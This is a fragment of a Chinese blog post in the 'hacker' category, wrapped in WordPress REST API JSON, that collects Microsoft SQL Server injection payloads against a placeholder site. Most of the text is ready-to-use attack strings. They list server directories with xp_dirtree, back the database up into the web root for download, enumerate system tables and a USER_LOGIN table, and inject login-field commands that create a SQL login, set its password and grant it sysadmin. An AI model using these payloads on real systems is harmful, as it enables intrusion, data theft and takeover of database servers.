\n\u8bed\u53e5\uff1ahttp:\/\/http:\/\/www.xxxxx.com\/down\/list.asp&id=1;create\u3000table\u3000dirs1(paths\u3000varchar(100),\u3000id\u3000int)--
\n\u8bed\u53e5\uff1ahttp:\/\/http:\/\/www.xxxxx.com\/down\/list.asp&id=1;insert\u3000dirs\u3000exec\u3000master.dbo.xp_dirtree 'e:\\web'--
\n\u8bed\u53e5\uff1ahttp:\/\/http:\/\/www.xxxxx.com\/down\/list.asp&id=1\u3000and\u30000<>(select\u3000top\u30001\u3000paths\u3000from\u3000dirs1)-
\n\u628a\u6570\u636e\u5e93\u5907\u4efd\u5230\u7f51\u9875\u76ee\u5f55\uff1a\u4e0b\u8f7d
\nhttp:\/\/http:\/\/www.xxxxx.com\/down\/list.asp&id=1;declare\u3000@a\u3000sysname;\u3000set\u3000@a=db_name();backup\u3000database\u3000@a\u3000to\u3000disk='e:\\web\\down.bak';--<\/p>\n

and%201=(select%20top%201%20name%20from(select%20top%2012%20id,name%20from%20sysobjects%20where%20xtype=char(85))%20T%20order%20by%20id%20desc)
\nand%201=(select%20Top%201%20col_name(object_id('USER_LOGIN'),1)%20from%20sysobjects) \u53c2\u770b\u76f8\u5173\u8868\u3002
\nand 1=(select%20user_id%20from%20USER_LOGIN)
\nand%200=(select%20user%20from%20USER_LOGIN%20where%20user>1)<\/p>\n

\u5982\u679c\u53ef\u4ee5\u901a\u8fc7\u8fde\u63a5\u7b26\u6ce8\u91ca\u6389\u540e\u9762\u7684\u9a8c\u8bc1\uff0c\u90a3\u4e48\u5c31\u66f4\u6709\u610f\u601d\u4e86\uff0c\u6765\u770b\u6211\u4eec\u80fd\u4f5c\u4ec0\u4e48\uff1a
\na\u3001\u5728\u7528\u6237\u540d\u4f4d\u7f6e\u8f93\u5165\u3010admin';exec master.dbo.sp_addlogin Cool;--\u3011\uff0c\u6dfb\u52a0\u4e00\u4e2asql\u7528\u6237
\nb\u3001\u5728\u7528\u6237\u540d\u4f4d\u7f6e\u8f93\u5165\u3010admin';exec master.dbo.sp_password null,123456,Cool;--\u3011\uff0c\u7ed9Cool\u8bbe\u7f6e\u5bc6\u7801\u4e3a123456
\nc\u3001\u5728\u7528\u6237\u540d\u4f4d\u7f6e\u8f93\u5165\u3010admin';exec master.dbo.sp_addsrvrolemember Cool,sysadmin;--\u3011\uff0c\u7ed9Cool\u8d4b\u4e88System Administrator\u6743\u9650<\/p>\n","protected":false},"excerpt":{"rendered":"

Ms Sql\u6ce8\u5c04\u8d44\u6599 Sql\u6ce8\u5c04\u603b\u7ed3 Sql\u6ce8\u5c04\u603b\u7ed3\uff08\u65e9\u6e90\u4e8e’or’1’=’1\uff09 \u6700\u91cd\u8981\u7684\u8868\u540d\uff1a select * from sysobjects sysobjects ncsysobjects sy...<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[10],"tags":[],"class_list":["post-168","post","type-post","status-publish","format-standard","hentry","category-hacker"],"jetpack_featured_media_url":"","_links":{"self":[{"href":"https:\/\/www.liangliang.org.cn\/index.php?rest_route=\/wp\/v2\/posts\/168","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.liangliang.org.cn\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.liangliang.org.cn\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.liangliang.org.cn\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.liangliang.org.cn\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=168"}],"version-history":[{"count":0,"href":"https:\/\/www.liangliang.org.cn\/index.php?rest_route=\/wp\/v2\/posts\/168\/revisions"}],"wp:attachment":[{"href":"https:\/\/www.liangliang.org.cn\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=168"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.liangliang.org.cn\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=168"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.liangliang.org.cn\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=168"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}